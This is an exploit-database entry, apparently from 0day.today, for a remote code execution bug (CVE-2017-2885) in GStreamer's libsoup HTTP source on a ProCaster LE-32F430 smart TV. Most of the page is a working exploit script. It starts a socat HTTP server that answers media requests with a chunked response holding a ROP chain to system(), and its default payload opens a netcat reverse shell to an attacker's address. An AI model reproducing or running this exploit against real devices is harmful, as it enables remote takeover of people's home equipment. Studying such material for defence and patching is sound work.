ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow Exploit

2020-12-0800:00:00

def

0day.today

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.004 Low

EPSS

Percentile

73.7%

JSON

ProCaster LE-32F430 SmartTV remote code execution exploit that leverages a stack overflow vulnerability in GStreamer souphttpsrc libsoup version 2.51.3.

#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <[email protected]> 2020-02-15 ................. 850day exploit lol

# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"

case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
    httpd)
        # Check dependencies
        for PROGRAM in socat python3 dd wc; do
            if ! command -v "$PROGRAM" >/dev/null; then
                printf "Missing dependency: %s\n" "$PROGRAM"
                exit 1
            fi
        done

        # Parse bind address and port
        case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
            *:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
            *) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
        esac >&2

        # Start socat HTTP server
        printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
        printf "Exploit system() payload: %s\n" "$CMD"
        exec socat -v -x \
            TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
            EXEC:"\\'$0\\' request"
        ;;

    -h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;

    request) set -e ;;

    *) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac

# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
    exec 1>&3 3>&-
    dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
    rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT

# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
    printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
    while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
    do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
    printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
    printf "HTTP/1.1 400 Bad Request\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Length: 0\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
fi

# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
    printf "HTTP/1.1 200 OK\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
    printf "Content-Length: %d\r\n" "12345"
    printf "Accept-Ranges: bytes\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
elif [ "$METHOD" != "GET" ]; then
    printf "HTTP/1.1 405 Not Allowed\r\n"
    printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
    printf "Content-Length: 0\r\n"
    printf "Connection: close\r\n"
    printf "\r\n"
    exit 0
fi

# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n",             #
b"Transfer-Encoding: chunked\r\n",  #
b"Connection: close\r\n",           #
b"\r\n",                            #
#####################################
b"1\r\n",           # start a chunk #
b">",               # 4B alignment  #
#####################################
LE32(0xAAAAAAAA),   # padding       #
LE32(0xBBBBBBBB),   # padding       #
LE32(0xCCCCCCCC),   # padding       #
#####################################
LE32(0x477B9C49),   # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3),   # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7),   # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287),   # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567),   # padding       #
BE32(0x89ABCDEF),   # padding       #
#####################################
LE32(0x477C01E5),   # (8) r8 = sym.system
LE32(0x477CF019),   # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7),   # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7),   # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3),   # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3),   # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08),   # valid pointer #
LE32(0x4787BB08),   # valid pointer #
#####################################
b"\r\n"             # payload EOF   # 248B
#####################################
]))
EOF